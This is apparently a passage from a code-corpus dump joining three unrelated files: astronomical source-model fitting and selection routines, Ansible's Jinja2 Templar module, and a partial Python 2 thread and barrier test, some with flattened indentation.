def update_and_subtract(self, i, src, tims, tim_ies=None, ps=None):
for itim,(tim,mods) in enumerate(zip(tims, self.models)):
if src is None:
mods[i] = None
continue
if tim is None:
continue
mod = src.getModelPatch(tim)
mods[i] = mod
if mod is None:
continue
if tim_ies is not None:
# Apply an extra mask (ie, the mask_others segmentation mask)
ie = tim_ies[itim]
if ie is None:
continue
inslice, outslice = mod.getSlices(tim.shape)
p = mod.patch[inslice]
img = tim.getImage()
img[outslice] -= p * (ie[outslice]>0)
else:
mod.addTo(tim.getImage(), scale=-1)
# if mod.patch.max() > 1e6:
# if ps is not None:
# z = np.zeros_like(tim.getImage())
# import pylab as plt
# plt.clf()
# plt.suptitle('tim: %s' % tim.name)
# plt.subplot(2,2,1)
# plt.imshow(mod.patch, interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('mod')
# plt.subplot(2,2,2)
# plt.imshow(tim.getImage(), interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('tim (before)')
# mod.addTo(z, scale=1)
# plt.subplot(2,2,3)
# plt.imshow(z, interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('mod')
# img = tim.getImage().copy()
# mod.addTo(img, scale=-1)
# plt.subplot(2,2,4)
# plt.imshow(img, interpolation='nearest', origin='lower')
# plt.colorbar()
# plt.title('tim-mod')
# ps.savefig()
def model_masks(self, i, src):
modelMasks = []
for mods in self.models:
d = dict()
modelMasks.append(d)
mod = mods[i]
if mod is not None:
if self.filledModelMasks:
mh,mw = mod.shape
d[src] = ModelMask(mod.x0, mod.y0, mw, mh)
else:
d[src] = ModelMask(mod.x0, mod.y0, mod.patch != 0)
return modelMasks
def remap_modelmask(modelMasks, oldsrc, newsrc):
    '''
    Re-key a list of per-image {source: mask} dicts, transferring the
    mask stored under *oldsrc* (if any) to *newsrc*.

    Returns a new list of new dicts; the inputs are not modified.
    '''
    remapped = []
    for masks in modelMasks:
        entry = {}
        if oldsrc in masks:
            entry[newsrc] = masks[oldsrc]
        remapped.append(entry)
    return remapped
def _clip_model_to_blob(mod, sh, ie):
    '''
    mod: Patch
    sh: tim shape
    ie: tim invError

    Returns: a new Patch clipped to the image bounds, with pixels zeroed
    where the inverse-error map is zero; or None if nothing survives.
    '''
    inslice, outslice = mod.getSlices(sh)
    yslice, xslice = inslice
    # Zero out model pixels that carry no weight in the image.
    clipped = mod.patch[inslice] * (ie[outslice] > 0)
    if clipped.shape == (0, 0):
        # NOTE(review): a patch that is empty in only one dimension
        # (e.g. shape (0, w)) passes this test and produces a degenerate
        # Patch -- confirm that callers tolerate that case.
        return None
    newmod = Patch(mod.x0 + xslice.start, mod.y0 + yslice.start, clipped)
    # Sanity checks: the clipped patch must lie within the image.
    nh, nw = newmod.shape
    assert(newmod.x0 >= 0)
    assert(newmod.y0 >= 0)
    imh, imw = sh
    assert(newmod.x0 + nw <= imw)
    assert(newmod.y0 + nh <= imh)
    return newmod
def _select_model(chisqs, nparams, galaxy_margin):
'''
Returns keepmod (string), the name of the preferred model.
'''
keepmod = 'none'
#print('_select_model: chisqs', chisqs)
# This is our "detection threshold": 5-sigma in
# *parameter-penalized* units; ie, ~5.2-sigma for point sources
cut = 5.**2
# Take the best of all models computed
diff = max([chisqs[name] - nparams[name] for name in chisqs.keys()
if name != 'none'] + [-1])
if diff < cut:
# Drop this source
return keepmod
# Now choose between point source and REX
if 'psf' in chisqs and not 'rex' in chisqs:
# bright stars / reference stars: we don't test the simple model.
return 'psf'
#print('PSF', chisqs.get('psf',0)-nparams['psf'], 'vs REX', chisqs.get('rex',0)-nparams['rex'])
# Is PSF good enough to keep?
if 'psf' in chisqs and (chisqs['psf']-nparams['psf'] >= cut):
keepmod = 'psf'
# Now choose between point source and REX
if 'psf' in chisqs and (
chisqs['psf']-nparams['psf'] >= chisqs.get('rex',0)-nparams['rex']):
#print('Keeping PSF')
keepmod = 'psf'
elif 'rex' in chisqs and (
chisqs['rex']-nparams['rex'] > chisqs.get('psf',0)-nparams['psf']):
#print('REX is better fit than PSF.')
oldkeepmod = keepmod
keepmod = 'rex'
# For REX, we also demand a fractionally better fit
dchisq_psf = chisqs.get('psf',0)
dchisq_rex = chisqs.get('rex',0)
if dchisq_psf > 0 and (dchisq_rex - dchisq_psf) < (0.01 * dchisq_psf):
#print('REX is not a fractionally better fit, keeping', oldkeepmod)
keepmod = oldkeepmod
if not ('exp' in chisqs or 'dev' in chisqs):
#print('No EXP or DEV; keeping', keepmod)
return keepmod
# This is our "upgrade" threshold: how much better a galaxy
# fit has to be versus psf
cut = galaxy_margin
# This is the "fractional" upgrade threshold for psf/rex to dev/exp:
# 1% of psf vs nothing
fcut = 0.01 * chisqs.get('psf', 0.)
cut = max(cut, fcut)
expdiff = chisqs.get('exp', 0) - chisqs[keepmod]
devdiff = chisqs.get('dev', 0) - chisqs[keepmod]
#print('EXP vs', keepmod, ':', expdiff)
#print('DEV vs', keepmod, ':', devdiff)
if not (expdiff > cut or devdiff > cut):
#print('Keeping', keepmod)
return keepmod
if expdiff > devdiff:
#print('Upgrading to EXP: diff', expdiff)
keepmod = 'exp'
else:
#print('Upgrading to DEV: diff', expdiff)
keepmod = 'dev'
# Consider Sersic models
if 'ser' not in chisqs:
return keepmod
serdiff = chisqs['ser'] - chisqs[keepmod]
sermargin = 25.
if serdiff < sermargin:
return keepmod
keepmod = 'ser'
return keepmod
def _chisq_improvement(src, chisqs, chisqs_none):
'''
chisqs, chisqs_none: dict of band->chisq
'''
bright = src.getBrightness()
bands = chisqs.keys()
fluxes = dict([(b, bright.getFlux(b)) for b in bands])
dchisq = 0.
for b in bands:
flux = fluxes[b]
if flux == 0:
continue
# this will be positive for an improved model
d = chisqs_none[b] - chisqs[b]
if flux > 0:
dchisq += d
else:
dchisq -= np.abs(d)
return dchisq
def _per_band_chisqs(tractor, bands):
chisqs = dict([(b,0) for b in bands])
for img in tractor.images:
chi = tractor.getChiImage(img=img)
chisqs[img.band] = chisqs[img.band] + (chi ** 2).sum()
return chisqs
| gpl-2.0 |
slohse/ansible | lib/ansible/template/__init__.py | 3 | 29684 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import contextlib
import datetime
import os
import pwd
import re
import time
from functools import wraps
from io import StringIO
from numbers import Number
try:
from hashlib import sha1
except ImportError:
from sha import sha as sha1
from jinja2.exceptions import TemplateSyntaxError, UndefinedError
from jinja2.loaders import FileSystemLoader
from jinja2.runtime import Context, StrictUndefined
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleFilterError, AnsibleUndefinedVariable, AnsibleAssertionError
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils._text import to_native, to_text, to_bytes
from ansible.module_utils.common._collections_compat import Sequence, Mapping
from ansible.plugins.loader import filter_loader, lookup_loader, test_loader
from ansible.template.safe_eval import safe_eval
from ansible.template.template import AnsibleJ2Template
from ansible.template.vars import AnsibleJ2Vars
from ansible.utils.unsafe_proxy import UnsafeProxy, wrap_var
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['Templar', 'generate_ansible_template_vars']
# NOTE: the regex for matching a bare single-variable expression
# (SINGLE_VAR) is built per-instance in Templar.__init__, since it
# depends on the environment's variable delimiters.

# Primitive types which we don't want Jinja to convert to strings.
NON_TEMPLATED_TYPES = (bool, Number)

# Template-header prefix that allows per-file jinja2 option overrides.
JINJA2_OVERRIDE = '#jinja2:'

# Whether jinja2's NativeEnvironment (which preserves Python types in
# template results) is available and enabled via configuration.
USE_JINJA2_NATIVE = False
if C.DEFAULT_JINJA2_NATIVE:
    try:
        from jinja2.nativetypes import NativeEnvironment as Environment
        from ansible.template.native_helpers import ansible_native_concat as j2_concat
        USE_JINJA2_NATIVE = True
    except ImportError:
        # jinja2 too old for native types; fall back to the classic
        # Environment and plain string concatenation.
        from jinja2 import Environment
        from jinja2.utils import concat as j2_concat
else:
    from jinja2 import Environment
    from jinja2.utils import concat as j2_concat
def generate_ansible_template_vars(path):
    '''
    Build the dict of magic variables made available when templating the
    file at *path*: template_host, template_path, template_mtime,
    template_uid, template_fullpath, template_run_date and the rendered
    ansible_managed string.
    '''
    b_path = to_bytes(path)
    try:
        owner = pwd.getpwuid(os.stat(b_path).st_uid).pw_name
    except (KeyError, TypeError):
        # No passwd entry (or a platform without one): fall back to the
        # numeric uid.
        owner = os.stat(b_path).st_uid

    temp_vars = {
        'template_host': to_text(os.uname()[1]),
        'template_path': path,
        'template_mtime': datetime.datetime.fromtimestamp(os.path.getmtime(b_path)),
        'template_uid': to_text(owner),
        'template_fullpath': os.path.abspath(path),
        'template_run_date': datetime.datetime.now(),
    }

    # Render the configured "ansible managed" string against this file's
    # metadata, then expand any strftime() format codes in it using the
    # file's modification time.
    managed_str = C.DEFAULT_MANAGED_STR.format(
        host=temp_vars['template_host'],
        uid=temp_vars['template_uid'],
        file=temp_vars['template_path'],
    )
    temp_vars['ansible_managed'] = to_text(
        time.strftime(to_native(managed_str),
                      time.localtime(os.path.getmtime(b_path))))
    return temp_vars
def _escape_backslashes(data, jinja_env):
    """Double backslashes within jinja2 expressions

    A user may enter something like this in a playbook::

      debug:
        msg: "Test Case 1\\3; {{ test1_name | regex_replace('^(.*)_name$', '\\1')}}"

    The text inside "{{ }}" is processed both by python and by jinja2,
    so backslash-escaped characters there get unescaped twice; without
    this helper, authors would need four backslashes inside expressions
    but only two outside them.  To spare them that inconsistency, we
    automatically double backslashes that appear inside string tokens of
    a jinja2 expression.
    """
    if '\\' in data and '{{' in data:
        out = []
        inside_expression = False
        for _, token_type, value in jinja_env.lex(jinja_env.preprocess(data)):
            if token_type == 'variable_begin':
                inside_expression = True
            elif token_type == 'variable_end':
                inside_expression = False
            if inside_expression and token_type == 'string':
                # Double backslashes only if we're inside of a jinja2
                # variable.
                value = value.replace('\\', '\\\\')
            out.append(value)
        data = ''.join(out)
    return data
def _count_newlines_from_end(in_str):
'''
Counts the number of newlines at the end of a string. This is used during
the jinja2 templating to ensure the count matches the input, since some newlines
may be thrown away during the templating.
'''
try:
i = len(in_str)
j = i - 1
while in_str[j] == '\n':
j -= 1
return i - 1 - j
except IndexError:
# Uncommon cases: zero length string and string containing only newlines
return i
def tests_as_filters_warning(name, func):
    '''
    Closure to enable displaying a deprecation warning when tests are
    used as a filter.

    Only used when registering ansible provided tests as filters; it
    should be removed in 2.9 along with that registration in
    Templar._get_filters.
    '''
    # The message only depends on *name*, so build it once up front.
    message = (
        'Using tests as filters is deprecated. Instead of using `result|%(name)s` use '
        '`result is %(name)s`' % dict(name=name)
    )

    @wraps(func)
    def deprecation_wrapper(*args, **kwargs):
        display.deprecated(message, version='2.9')
        return func(*args, **kwargs)

    return deprecation_wrapper
class AnsibleContext(Context):
    '''
    A custom context, which intercepts resolve() calls and sets a flag
    internally if any variable lookup returns an AnsibleUnsafe value. This
    flag is checked post-templating, and (when set) will result in the
    final templated result being wrapped via UnsafeProxy.
    '''
    def __init__(self, *args, **kwargs):
        super(AnsibleContext, self).__init__(*args, **kwargs)
        self.unsafe = False

    def _is_unsafe(self, val):
        '''
        Recursively check whether *val* -- or, for dicts and lists,
        anything they contain -- carries the AnsibleUnsafe marker.
        Containers are walked because they may be repr'd with a key or
        value containing jinja2 syntax, which would otherwise lose the
        AnsibleUnsafe value.
        '''
        if isinstance(val, dict):
            return any(self._is_unsafe(v) for v in val.values())
        if isinstance(val, list):
            return any(self._is_unsafe(item) for item in val)
        return isinstance(val, string_types) and hasattr(val, '__UNSAFE__')

    def _update_unsafe(self, val):
        # Once the flag is set it stays set; skip the (recursive) check
        # when it already is.
        if val is not None and not self.unsafe and self._is_unsafe(val):
            self.unsafe = True

    def resolve(self, key):
        '''
        The intercepted resolve(), which uses the helper above to set the
        internal flag whenever an unsafe variable value is returned.
        '''
        result = super(AnsibleContext, self).resolve(key)
        self._update_unsafe(result)
        return result

    def resolve_or_missing(self, key):
        result = super(AnsibleContext, self).resolve_or_missing(key)
        self._update_unsafe(result)
        return result
class AnsibleEnvironment(Environment):
    '''
    Our custom environment, which simply allows us to override the class-level
    values for the Template and Context classes used by jinja2 internally.
    '''
    # Jinja2 instantiates these classes internally when compiling and
    # rendering; overriding them hooks in the unsafe-tracking context
    # and Ansible's template wrapper.
    context_class = AnsibleContext
    template_class = AnsibleJ2Template
class Templar:
    '''
    The main class for templating, with the main entry-point of template().
    '''

    def __init__(self, loader, shared_loader_obj=None, variables=None):
        # :arg loader: DataLoader used for basedir resolution and passed
        #     on to lookup plugins.
        # :kwarg shared_loader_obj: optional object providing the
        #     filter/test/lookup plugin loaders; falls back to the
        #     module-level loaders.
        # :kwarg variables: initial template variables dict.
        variables = {} if variables is None else variables

        self._loader = loader
        self._filters = None
        self._tests = None
        self._available_variables = variables
        self._cached_result = {}

        if loader:
            self._basedir = loader.get_basedir()
        else:
            self._basedir = './'

        if shared_loader_obj:
            self._filter_loader = getattr(shared_loader_obj, 'filter_loader')
            self._test_loader = getattr(shared_loader_obj, 'test_loader')
            self._lookup_loader = getattr(shared_loader_obj, 'lookup_loader')
        else:
            self._filter_loader = filter_loader
            self._test_loader = test_loader
            self._lookup_loader = lookup_loader

        # flags to determine whether certain failures during templating
        # should result in fatal errors being raised
        self._fail_on_lookup_errors = True
        self._fail_on_filter_errors = True
        self._fail_on_undefined_errors = C.DEFAULT_UNDEFINED_VAR_BEHAVIOR

        self.environment = AnsibleEnvironment(
            trim_blocks=True,
            undefined=StrictUndefined,
            extensions=self._get_extensions(),
            finalize=self._finalize,
            loader=FileSystemLoader(self._basedir),
        )

        # the current rendering context under which the templar class is working
        self.cur_context = None

        # Matches a string that is exactly one bare variable reference,
        # e.g. "{{ foo }}"; built here because it depends on the
        # environment's variable delimiters.
        self.SINGLE_VAR = re.compile(r"^%s\s*(\w*)\s*%s$" % (self.environment.variable_start_string, self.environment.variable_end_string))

        # Matches any of the jinja2 delimiter strings.
        self._clean_regex = re.compile(r'(?:%s|%s|%s|%s)' % (
            self.environment.variable_start_string,
            self.environment.block_start_string,
            self.environment.block_end_string,
            self.environment.variable_end_string
        ))
        # Matches expressions ending in a string-type filter, whose
        # results should not be converted back to container types.
        self._no_type_regex = re.compile(r'.*?\|\s*(?:%s)(?:\([^\|]*\))?\s*\)?\s*(?:%s)' %
                                         ('|'.join(C.STRING_TYPE_FILTERS), self.environment.variable_end_string))

    def _get_filters(self, builtin_filters):
        '''
        Returns filter plugins, after loading and caching them if need be
        '''
        if self._filters is not None:
            return self._filters.copy()

        self._filters = dict()

        # TODO: Remove registering tests as filters in 2.9
        for name, func in self._get_tests().items():
            if name in builtin_filters:
                # If we have a custom test named the same as a builtin filter, don't register as a filter
                continue
            self._filters[name] = tests_as_filters_warning(name, func)

        for fp in self._filter_loader.all():
            self._filters.update(fp.filters())

        return self._filters.copy()

    def _get_tests(self):
        '''
        Returns tests plugins, after loading and caching them if need be
        '''
        if self._tests is not None:
            return self._tests.copy()

        self._tests = dict()
        for fp in self._test_loader.all():
            self._tests.update(fp.tests())

        return self._tests.copy()

    def _get_extensions(self):
        '''
        Return jinja2 extensions to load.

        If some extensions are set via jinja_extensions in ansible.cfg, we try
        to load them with the jinja environment.
        '''
        jinja_exts = []

        if C.DEFAULT_JINJA2_EXTENSIONS:
            # make sure the configuration directive doesn't contain spaces
            # and split extensions in an array
            jinja_exts = C.DEFAULT_JINJA2_EXTENSIONS.replace(" ", "").split(',')

        return jinja_exts

    def set_available_variables(self, variables):
        '''
        Sets the list of template variables this Templar instance will use
        to template things, so we don't have to pass them around between
        internal methods. We also clear the template cache here, as the variables
        are being changed.
        '''
        if not isinstance(variables, dict):
            raise AnsibleAssertionError("the type of 'variables' should be a dict but was a %s" % (type(variables)))
        self._available_variables = variables
        self._cached_result = {}

    def template(self, variable, convert_bare=False, preserve_trailing_newlines=True, escape_backslashes=True, fail_on_undefined=None, overrides=None,
                 convert_data=True, static_vars=None, cache=True, disable_lookups=False):
        '''
        Templates (possibly recursively) any given data as input. If convert_bare is
        set to True, the given data will be wrapped as a jinja2 variable ('{{foo}}')
        before being sent through the template engine.
        '''
        static_vars = [''] if static_vars is None else static_vars

        # Don't template unsafe variables, just return them.
        if hasattr(variable, '__UNSAFE__'):
            return variable

        if fail_on_undefined is None:
            fail_on_undefined = self._fail_on_undefined_errors

        try:
            if convert_bare:
                variable = self._convert_bare_variable(variable)

            if isinstance(variable, string_types):
                result = variable

                if self._contains_vars(variable):
                    # Check to see if the string we are trying to render is just referencing a single
                    # var.  In this case we don't want to accidentally change the type of the variable
                    # to a string by using the jinja template renderer. We just want to pass it.
                    only_one = self.SINGLE_VAR.match(variable)
                    if only_one:
                        var_name = only_one.group(1)
                        if var_name in self._available_variables:
                            resolved_val = self._available_variables[var_name]
                            if isinstance(resolved_val, NON_TEMPLATED_TYPES):
                                return resolved_val
                            elif resolved_val is None:
                                return C.DEFAULT_NULL_REPRESENTATION

                    # Using a cache in order to prevent template calls with already templated variables
                    sha1_hash = None
                    if cache:
                        # Cache key covers both the input text and the
                        # options that affect the rendered result.
                        variable_hash = sha1(text_type(variable).encode('utf-8'))
                        options_hash = sha1(
                            (
                                text_type(preserve_trailing_newlines) +
                                text_type(escape_backslashes) +
                                text_type(fail_on_undefined) +
                                text_type(overrides)
                            ).encode('utf-8')
                        )
                        sha1_hash = variable_hash.hexdigest() + options_hash.hexdigest()
                    if cache and sha1_hash in self._cached_result:
                        result = self._cached_result[sha1_hash]
                    else:
                        result = self.do_template(
                            variable,
                            preserve_trailing_newlines=preserve_trailing_newlines,
                            escape_backslashes=escape_backslashes,
                            fail_on_undefined=fail_on_undefined,
                            overrides=overrides,
                            disable_lookups=disable_lookups,
                        )

                        if not USE_JINJA2_NATIVE:
                            unsafe = hasattr(result, '__UNSAFE__')
                            if convert_data and not self._no_type_regex.match(variable):
                                # if this looks like a dictionary or list, convert it to such using the safe_eval method
                                if (result.startswith("{") and not result.startswith(self.environment.variable_start_string)) or \
                                        result.startswith("[") or result in ("True", "False"):
                                    eval_results = safe_eval(result, locals=self._available_variables, include_exceptions=True)
                                    if eval_results[1] is None:
                                        result = eval_results[0]
                                        if unsafe:
                                            # Re-apply the unsafe marker lost
                                            # during safe_eval conversion.
                                            result = wrap_var(result)
                                    else:
                                        # FIXME: if the safe_eval raised an error, should we do something with it?
                                        pass

                        # we only cache in the case where we have a single variable
                        # name, to make sure we're not putting things which may otherwise
                        # be dynamic in the cache (filters, lookups, etc.)
                        if cache:
                            self._cached_result[sha1_hash] = result

                return result

            elif isinstance(variable, (list, tuple)):
                # Template each element recursively.
                return [self.template(
                    v,
                    preserve_trailing_newlines=preserve_trailing_newlines,
                    fail_on_undefined=fail_on_undefined,
                    overrides=overrides,
                    disable_lookups=disable_lookups,
                ) for v in variable]

            elif isinstance(variable, (dict, Mapping)):
                d = {}
                # we don't use iteritems() here to avoid problems if the underlying dict
                # changes sizes due to the templating, which can happen with hostvars
                for k in variable.keys():
                    if k not in static_vars:
                        d[k] = self.template(
                            variable[k],
                            preserve_trailing_newlines=preserve_trailing_newlines,
                            fail_on_undefined=fail_on_undefined,
                            overrides=overrides,
                            disable_lookups=disable_lookups,
                        )
                    else:
                        d[k] = variable[k]
                return d
            else:
                return variable

        except AnsibleFilterError:
            if self._fail_on_filter_errors:
                raise
            else:
                return variable

    def is_template(self, data):
        ''' lets us know if data has a template'''
        if isinstance(data, string_types):
            try:
                new = self.do_template(data, fail_on_undefined=True)
            except (AnsibleUndefinedVariable, UndefinedError):
                return True
            # NOTE(review): bare except -- treats *any* other failure as
            # "not a template"; confirm that is the intended behavior.
            except:
                return False
            return (new != data)
        elif isinstance(data, (list, tuple)):
            for v in data:
                if self.is_template(v):
                    return True
        elif isinstance(data, dict):
            for k in data:
                if self.is_template(k) or self.is_template(data[k]):
                    return True
        return False

    def templatable(self, data):
        '''
        returns True if the data can be templated w/o errors
        '''
        templatable = True
        try:
            self.template(data)
        except:
            templatable = False
        return templatable

    def _contains_vars(self, data):
        '''
        returns True if the data contains a variable pattern
        '''
        if isinstance(data, string_types):
            for marker in (self.environment.block_start_string, self.environment.variable_start_string, self.environment.comment_start_string):
                if marker in data:
                    return True
        return False

    def _convert_bare_variable(self, variable):
        '''
        Wraps a bare string, which may have an attribute portion (ie. foo.bar)
        in jinja2 variable braces so that it is evaluated properly.
        '''
        if isinstance(variable, string_types):
            contains_filters = "|" in variable
            first_part = variable.split("|")[0].split(".")[0].split("[")[0]
            if (contains_filters or first_part in self._available_variables) and self.environment.variable_start_string not in variable:
                return "%s%s%s" % (self.environment.variable_start_string, variable, self.environment.variable_end_string)

        # the variable didn't meet the conditions to be converted,
        # so just return it as-is
        return variable

    def _finalize(self, thing):
        '''
        A custom finalize method for jinja2, which prevents None from being returned. This
        avoids a string of ``"None"`` as ``None`` has no importance in YAML.

        If using ANSIBLE_JINJA2_NATIVE we bypass this and return the actual value always
        '''
        if USE_JINJA2_NATIVE:
            return thing

        return thing if thing is not None else ''

    def _fail_lookup(self, name, *args, **kwargs):
        # Installed in place of lookup/query when lookups are disabled.
        raise AnsibleError("The lookup `%s` was found, however lookups were disabled from templating" % name)

    def _query_lookup(self, name, *args, **kwargs):
        ''' wrapper for lookup, force wantlist true'''
        kwargs['wantlist'] = True
        return self._lookup(name, *args, **kwargs)

    def _lookup(self, name, *args, **kwargs):
        # Run the named lookup plugin, wrapping its results as unsafe
        # unless explicitly allowed.
        instance = self._lookup_loader.get(name.lower(), loader=self._loader, templar=self)

        if instance is not None:
            wantlist = kwargs.pop('wantlist', False)
            allow_unsafe = kwargs.pop('allow_unsafe', C.DEFAULT_ALLOW_UNSAFE_LOOKUPS)
            errors = kwargs.pop('errors', 'strict')

            from ansible.utils.listify import listify_lookup_plugin_terms
            loop_terms = listify_lookup_plugin_terms(terms=args, templar=self, loader=self._loader, fail_on_undefined=True, convert_bare=False)
            # safely catch run failures per #5059
            try:
                ran = instance.run(loop_terms, variables=self._available_variables, **kwargs)
            except (AnsibleUndefinedVariable, UndefinedError) as e:
                raise AnsibleUndefinedVariable(e)
            except Exception as e:
                if self._fail_on_lookup_errors:
                    msg = u"An unhandled exception occurred while running the lookup plugin '%s'. Error was a %s, original message: %s" % \
                          (name, type(e), to_text(e))
                    # The 'errors' option controls how hard we fail.
                    if errors == 'warn':
                        display.warning(msg)
                    elif errors == 'ignore':
                        display.display(msg, log_only=True)
                    else:
                        raise AnsibleError(to_native(msg))
                ran = None

            if ran and not allow_unsafe:
                if wantlist:
                    ran = wrap_var(ran)
                else:
                    try:
                        ran = UnsafeProxy(",".join(ran))
                    except TypeError:
                        # Lookup Plugins should always return lists.  Throw an error if that's not
                        # the case:
                        if not isinstance(ran, Sequence):
                            raise AnsibleError("The lookup plugin '%s' did not return a list."
                                               % name)

                        # The TypeError we can recover from is when the value *inside* of the list
                        # is not a string
                        if len(ran) == 1:
                            ran = wrap_var(ran[0])
                        else:
                            ran = wrap_var(ran)

                if self.cur_context:
                    # Propagate unsafeness to the rendering context.
                    self.cur_context.unsafe = True
            return ran
        else:
            raise AnsibleError("lookup plugin (%s) not found" % name)

    def do_template(self, data, preserve_trailing_newlines=True, escape_backslashes=True, fail_on_undefined=None, overrides=None, disable_lookups=False):
        # Low-level single-pass render of *data* through jinja2.
        if USE_JINJA2_NATIVE and not isinstance(data, string_types):
            return data

        # For preserving the number of input newlines in the output (used
        # later in this method)
        if not USE_JINJA2_NATIVE:
            data_newlines = _count_newlines_from_end(data)
        else:
            data_newlines = None

        if fail_on_undefined is None:
            fail_on_undefined = self._fail_on_undefined_errors

        try:
            # allows template header overrides to change jinja2 options.
            if overrides is None:
                myenv = self.environment.overlay()
            else:
                myenv = self.environment.overlay(overrides)

            # Get jinja env overrides from template
            if hasattr(data, 'startswith') and data.startswith(JINJA2_OVERRIDE):
                eol = data.find('\n')
                line = data[len(JINJA2_OVERRIDE):eol]
                data = data[eol + 1:]
                for pair in line.split(','):
                    (key, val) = pair.split(':')
                    key = key.strip()
                    setattr(myenv, key, ast.literal_eval(val.strip()))

            # Adds Ansible custom filters and tests
            myenv.filters.update(self._get_filters(myenv.filters))
            myenv.tests.update(self._get_tests())

            if escape_backslashes:
                # Allow users to specify backslashes in playbooks as "\\" instead of as "\\\\".
                data = _escape_backslashes(data, myenv)

            try:
                t = myenv.from_string(data)
            except TemplateSyntaxError as e:
                raise AnsibleError("template error while templating string: %s. String: %s" % (to_native(e), to_native(data)))
            except Exception as e:
                if 'recursion' in to_native(e):
                    raise AnsibleError("recursive loop detected in template string: %s" % to_native(data))
                else:
                    return data

            if disable_lookups:
                t.globals['query'] = t.globals['q'] = t.globals['lookup'] = self._fail_lookup
            else:
                t.globals['lookup'] = self._lookup
                t.globals['query'] = t.globals['q'] = self._query_lookup

            t.globals['finalize'] = self._finalize

            jvars = AnsibleJ2Vars(self, t.globals)

            self.cur_context = new_context = t.new_context(jvars, shared=True)
            rf = t.root_render_func(new_context)

            try:
                res = j2_concat(rf)
                if getattr(new_context, 'unsafe', False):
                    # Any unsafe variable resolved during rendering makes
                    # the whole result unsafe.
                    res = wrap_var(res)
            except TypeError as te:
                if 'StrictUndefined' in to_native(te):
                    errmsg = "Unable to look up a name or access an attribute in template string (%s).\n" % to_native(data)
                    errmsg += "Make sure your variable name does not contain invalid characters like '-': %s" % to_native(te)
                    raise AnsibleUndefinedVariable(errmsg)
                else:
                    display.debug("failing because of a type error, template data is: %s" % to_native(data))
                    raise AnsibleError("Unexpected templating type error occurred on (%s): %s" % (to_native(data), to_native(te)))

            if USE_JINJA2_NATIVE:
                return res

            if preserve_trailing_newlines:
                # The low level calls above do not preserve the newline
                # characters at the end of the input data, so we use the
                # calculate the difference in newlines and append them
                # to the resulting output for parity
                #
                # jinja2 added a keep_trailing_newline option in 2.7 when
                # creating an Environment.  That would let us make this code
                # better (remove a single newline if
                # preserve_trailing_newlines is False).  Once we can depend on
                # that version being present, modify our code to set that when
                # initializing self.environment and remove a single trailing
                # newline here if preserve_newlines is False.
                res_newlines = _count_newlines_from_end(res)
                if data_newlines > res_newlines:
                    res += self.environment.newline_sequence * (data_newlines - res_newlines)
            return res
        except (UndefinedError, AnsibleUndefinedVariable) as e:
            if fail_on_undefined:
                raise AnsibleUndefinedVariable(e)
            else:
                display.debug("Ignoring undefined failure: %s" % to_text(e))
                return data

    # for backwards compatibility in case anyone is using old private method directly
    _do_template = do_template
| gpl-3.0 |
sensysnetworks/uClinux | user/python/Lib/test/test_thread.py | 12 | 2492 | # Very rudimentary test of thread module
# Create a bunch of threads, let each do some work, wait until all are done
from test_support import verbose
import random
import thread
import time
mutex = thread.allocate_lock()
rmutex = thread.allocate_lock() # for calls to random
running = 0
done = thread.allocate_lock()
done.acquire()
numtasks = 10
def task(ident):
    """Sleep a random amount, then check out via the shared counters.

    The last task to finish (running hits 0) releases the 'done' lock,
    waking the main thread.
    """
    global running
    # Serialize calls into the random module (see rmutex above).
    rmutex.acquire()
    delay = random.random() * numtasks
    rmutex.release()
    if verbose:
        print 'task', ident, 'will run for', round(delay, 1), 'sec'
    time.sleep(delay)
    if verbose:
        print 'task', ident, 'done'
    mutex.acquire()
    running = running - 1
    if running == 0:
        # Last task out: wake the main thread.
        done.release()
    mutex.release()
# Monotonically increasing task id, protected by 'mutex'.
next_ident = 0

def newtask():
    """Start one new task() thread with a fresh ident, under the mutex."""
    global next_ident, running
    mutex.acquire()
    next_ident = next_ident + 1
    if verbose:
        print 'creating task', next_ident
    thread.start_new_thread(task, (next_ident,))
    running = running + 1
    mutex.release()
# Phase 1: spawn numtasks threads, then block on 'done' until the last
# task releases it.
for i in range(numtasks):
    newtask()

print 'waiting for all tasks to complete'
done.acquire()
print 'all tasks done'
class barrier:
    """A reusable barrier for self.n threads.

    Built from two locks acting as turnstiles: 'checkin' counts threads
    arriving, 'checkout' releases them one at a time; the hand-off order
    re-arms the barrier so it can be entered repeatedly.
    """
    def __init__(self, n):
        self.n = n
        self.waiting = 0
        self.checkin = thread.allocate_lock()
        # 'checkout' starts held so early arrivers block in enter().
        self.checkout = thread.allocate_lock()
        self.checkout.acquire()

    def enter(self):
        checkin, checkout = self.checkin, self.checkout

        checkin.acquire()
        self.waiting = self.waiting + 1
        if self.waiting == self.n:
            # Last thread to arrive: open the checkout turnstile.  Note
            # that 'checkin' is deliberately NOT released here -- the
            # last thread to leave does that below, re-arming the barrier.
            self.waiting = self.n - 1
            checkout.release()
            return
        checkin.release()

        checkout.acquire()
        self.waiting = self.waiting - 1
        if self.waiting == 0:
            # Last thread to leave: re-open check-in for the next round.
            checkin.release()
            return
        checkout.release()
# Number of round trips each thread makes through the barrier.
numtrips = 3

def task2(ident):
    """Make numtrips trips through the shared barrier 'bar', then check out."""
    global running
    for i in range(numtrips):
        if ident == 0:
            # give it a good chance to enter the next
            # barrier before the others are all out
            # of the current one
            delay = 0.001
        else:
            # Serialize calls into the random module (see rmutex above).
            rmutex.acquire()
            delay = random.random() * numtasks
            rmutex.release()
        if verbose:
            print 'task', ident, 'will run for', round(delay, 1), 'sec'
        time.sleep(delay)
        if verbose:
            print 'task', ident, 'entering barrier', i
        bar.enter()
        if verbose:
            print 'task', ident, 'leaving barrier', i
